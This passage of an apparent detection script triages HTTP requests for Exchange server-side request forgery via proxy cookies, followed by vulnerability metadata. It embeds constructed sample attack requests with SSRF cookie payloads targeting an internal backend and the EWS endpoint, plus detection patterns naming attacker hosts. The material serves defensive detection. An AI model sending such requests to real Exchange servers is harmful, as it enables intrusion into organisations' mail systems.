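    method, path, cookies = parse_request(raw)
    findings: List[str] = []
    for name in PROXY_COOKIES:
        if name not in cookies:
            continue
        value = cookies[name]
        findings.append(f"{name} cookie present on {method} {path}")
        if re.search(r"~\d+$", value):  # the '~<version>' suffix seen in every PoC request
            findings.append(f"{name} carries a '~<version>' suffix: {value}")
        host = backend_host(value)
        if host not in own_servers:  # localhost, attacker IPs, burpcollaborator.net, ...
            findings.append(f"{name} targets non-Exchange backend host '{host}'")
    if findings and STATIC_PATH.match(path):
        findings.append(f"proxy cookie on static-resource path {path}")
    return findings


# Constructed samples modelled on the requests in the assessment above.
SSRF_REQUEST = """GET /owa/auth/22702.js HTTP/1.1
Host: 192.168.123.183
User-Agent: curl/7.64.1
Cookie: X-AnonResource=true; X-AnonResource-Backend=192.168.123.1~4563
Connection: Keep-Alive
"""
EWS_REQUEST = """GET /ecp/1849.js HTTP/1.1
Host: 192.168.123.183
Cookie: X-BEResource=WIN-T4RO9496TA7/EWS/Exchange.asmx?~22406
"""
BENIGN_REQUEST = """GET /owa/auth/logon.aspx?url=https%3a%2f%2fmail%2fowa HTTP/1.1
Host: 192.168.123.183
Cookie: sessionid=constructed-value
"""
# Assumed inventory of the organisation's own Exchange servers (lower-case).
OWN_SERVERS = {"win-t4ro9496ta7", "win-t4ro9496ta7.gibson.local"}

if __name__ == "__main__":
    for label, req in (("ssrf", SSRF_REQUEST), ("ews", EWS_REQUEST), ("benign", BENIGN_REQUEST)):
        print(label, triage(req, OWN_SERVERS))
```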
General Information
Vendors
- microsoft
Products
- exchange server 2013
- exchange server 2016
- exchange server 2019
Exploited in the Wild
- Government or Industry Alert (https://us-cert.cisa.gov/ncas/alerts/aa21-209a)
- News Article or Blog (https://www.tenable.com/blog/contileaks-chats-reveal-over-30-vulnerabilities-used-by-conti-ransomware-affiliates)
- Other: 2021 Commonly Exploited Vulnerabilities (https://www.ic3.gov/Media/News/2021/210728.pdf)